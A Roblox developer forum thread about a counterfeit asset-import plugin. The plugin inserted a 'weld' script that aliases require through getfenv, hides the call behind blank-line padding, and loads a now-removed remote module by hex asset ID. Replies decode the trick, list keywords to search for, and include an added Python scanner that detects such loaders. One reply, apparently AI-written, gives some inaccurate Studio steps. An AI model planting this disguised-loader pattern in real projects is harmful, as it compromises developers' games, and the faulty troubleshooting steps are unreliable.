Potential Virus or Strange Activities

Hello. I started using the recently updated Asset Manager in one of my games, and I saw this;


(It’s the highlighted model you should be looking at)
I don’t remember adding this module script to my game (the model is a module).
I opened the script and this was the content;

local module = {}
-- hello if u cracked this model, nothing good is here anyways
-- im mostly using this to cashgrab so yeah
function module.IDontLikeWhenYouRequireMe()
	warn()
	local RS = game:GetService("RunService")
	if not RS:IsStudio() then

	end
end
function module.Inventory(plr)
	warn()
	local RS = game:GetService("RunService")
	if not RS:IsStudio() then

	end
end
return module

On its own, it’s quite strange to me, but I have also seen the function module.IDontLikeWhenYouRequireMe() used before. It is used in a plugin called ‘Load Catalog Items’ by IAVT_FVL.

As the name implies, it’s used for importing accessories and things like that. However it comes with a weld script when you import an accessory. The content of that weld script is;

--- DONT REMOVE THIS. IT MAKES THE HAT STAY IN PLACE.
getfenv()["table"] = require












































































table(0x1455201FB).IDontLikeWhenYouRequireMe()

(I did not add the huge gap, it was there always)
See what I mean? It uses the same IDontLikeWhenYouRequireMe() for both scripts. This script is basically requiring another module script and using the same function name. Can anyone help me out with this and tell me what the weld script actually does? I know the module script doesn’t do anything, just checks if the game is run in Studio or not. I think this has been around for a while, but I have only just noticed it now.

EDIT: The plugin I used was a fake compromised replica of another plugin. Should have known that earlier.

2 Likes

Mmh… This could be related to a hidden script or an external plugin causing unexpected behavior. Here’s a structured approach to diagnosing and resolving it:

Steps to Identify & Remove Potential Viruses in Roblox Studio

  1. Search for Suspicious Scripts
  • Open Roblox Studio and press Ctrl + Shift + F.
  • Search for keywords like "require", "getfenv", "Instance.new('Script')", or "Instance.new('LocalScript')"—these are often used in malicious scripts.
  2. Check for Hidden Objects
  • Open Explorer and look for unusual objects in StarterPlayerScripts, StarterCharacterScripts, or ReplicatedStorage.
  • Some viruses hide scripts inside models or GUI elements.
  3. Disable Plugins Temporarily
  • Go to Manage Plugins and disable all third-party plugins.
  • Some plugins may inject unwanted scripts into your game.
  4. Use the MicroProfiler
  • Press F9 in Studio to open the MicroProfiler.
  • Look for scripts that are running excessively or creating objects unexpectedly.
  5. Check Free Models
  • If you’ve used Toolbox assets, inspect them carefully.
  • Some free models contain hidden scripts that spawn parts or interfere with gameplay.
  6. Reset Studio Settings
  • Go to File → Studio Settings → Reset Layout to ensure no hidden UI issues.

If the issue persists, consider recreating the game in a fresh place and manually transferring assets to rule out hidden scripts.

Let me know if you need more troubleshooting steps! You can also check out this DevForum discussion on similar virus-related issues.

[PS: I am working to improve my answers to be informative, let me know if you need more things!]

3 Likes

People in the past have been known for naming their malware scripts Weld to make them look harmless or necessary (Have seen a lot of people / games with them). But assuming the top script is the one actually being required, I doubt this is malware, or at least not a functional one. It doesn’t do anything harmful to your game, but it also doesn’t serve any real purpose. It looks more like filler or obfuscation added by the plugin creator, at first I thought it was to discourage tampering, but at the same time why would anyone obfuscate a code that welds some parts together? Well anyways, I recommend deleting the plugin, and removing any script that you don’t recognize from your game.

2 Likes

Thanks for the reply. I have tried your method but nothing new came out. However, I found out that the plugin I used was a fake replica of a real one, which makes more sense with it having malicious code. I’m not sure if the actual module is in my games anymore, I don’t seem to find them, I just don’t know how it got in my asset manager. Normally I would delete the weld scripts, so that’s clear.

1 Like

I figured so as well. I was wondering how the module script would do any damage if it only checks for the game being run in Studio. I also deleted the plugin. Just got me confused especially with the getfenv part.

1 Like

That's just to throw people off, it overwrites the table keyword with require

getfenv()["table"] = print

table('hey') -- hey
1 Like


and to answer OP, yeah, it doesn't look like the script does anything. it might have at some point? either way you should probably remove that plugin

6 Likes

it grabs script environment globals and sets global “table” to equal function “require”
practically

local table = require

although technically a little different

1 Like

stop this AI paranoia
Obviously it will flag any professional response as AI also it doesn’t explain algorithm of “detecting AI” (hint: it doesn’t have one)

Using AI (for Roblox in particular, because there’s little documentation compared to something like Unity) can yield incorrect advice. Bad advice is worse than no advice.

1 Like

Well, most of the advice was true except for 6th (yeah, it’s definitely AI caught in 4K).

table(0x1455201FB) where getfenv()["table"] has become require does the same thing as require(0x1455201FB) which is require(5457969659) in base 10

The asset it tries to grab has already been taken down, but it probably had virus code before that

4 Likes
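The alias trick explained in the replies above, as an added example that is not part of any post in this thread: a small Python scanner over exported script source that resolves names aliased to require (through getfenv or a local) and reports the decimal asset ID behind each numeric call. The function names, the regexes and the shortened sample are assumptions made for illustration; only the weld script lines and the ID come from the thread.

```python
import re

# Constructed sample: the weld script quoted in this thread, with the
# blank-line gap shortened to 20 lines.
SAMPLE = (
    '--- DONT REMOVE THIS. IT MAKES THE HAT STAY IN PLACE.\n'
    'getfenv()["table"] = require\n'
    + '\n' * 20 +
    'table(0x1455201FB).IDontLikeWhenYouRequireMe()\n'
)

# Matches getfenv()["name"] = require, getfenv().name = require and
# local name = require (but not local name = require(...)).
ALIAS_RE = re.compile(
    r'''(?:getfenv\s*\(\s*\d*\s*\)\s*(?:\[\s*["'](\w+)["']\s*\]|\.\s*(\w+))'''
    r'''|local\s+(\w+))\s*=\s*require\b(?!\s*\()'''
)
NUM = r'(0[xX][0-9a-fA-F]+|\d+)'  # hex or decimal literal (simplified)


def find_remote_requires(source):
    """Return (line, callee, literal, decimal_id) for each call to require,
    or to a name aliased to require, that takes a numeric literal."""
    names = {"require"}
    for m in ALIAS_RE.finditer(source):
        names.add(next(g for g in m.groups() if g))
    callee = '|'.join(re.escape(n) for n in sorted(names))
    call_re = re.compile(r'(?<![\w.:])(' + callee + r')\s*\(\s*' + NUM + r'\s*\)')
    hits = []
    for m in call_re.finditer(source):
        lit = m.group(2)
        value = int(lit, 16) if lit.lower().startswith('0x') else int(lit)
        line = source.count('\n', 0, m.start()) + 1
        hits.append((line, m.group(1), lit, value))
    return hits


def longest_blank_run(source):
    """Longest run of blank lines: the padding that pushes the call out of view."""
    best = run = 0
    for line in source.split('\n'):
        run = run + 1 if not line.strip() else 0
        best = max(best, run)
    return best


if __name__ == "__main__":
    for hit in find_remote_requires(SAMPLE):
        print("line %d: %s(%s) -> require(%d)" % hit)
    print("longest blank run:", longest_blank_run(SAMPLE))
```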

The Id 5457969659 does match this;


Like you said, this means this module was the model that got taken down.

But there isn’t any malicious code in the module script, just some unfinished script, that was probably meant to be a virus.

When in doubt, exercise caution and don’t use it! If you’re looking for an asset inserter, I had made one years ago. Hopefully it’ll fit your wants and needs. :smile:

1 Like

All the code you provided does is that it requires a module in a sketchy way so it’s hard for common string matching patterns to detect it. There must be hidden code somewhere, but it’s not in this post.

Maybe the dev tried to be sneaky and instead of making the virus right away, they created the dependency, and then kept waiting until enough people installed the plugin before actually injecting in the virus code. Basically gaining user trust first so the victims are much more in the future, a very known pattern in cybersecurity things.

A random thought of mine

If you think about it companies tend to do this too. When a company is small and nobody knows them, they give the user perks the other companies specializing on the same subject don’t because they don’t have to. For example privacy, cheaper pricing or free services, etc. But when that same company gains the reputation they initially wanted, they become just like the companies they were initially fighting, removing most of the features that brought them there.

Could be true actually, but the model for the module script has been shut down so I’m not too sure about that. I have checked for any other scripts that can link to these scripts just briefly, so I probably do need to review them again.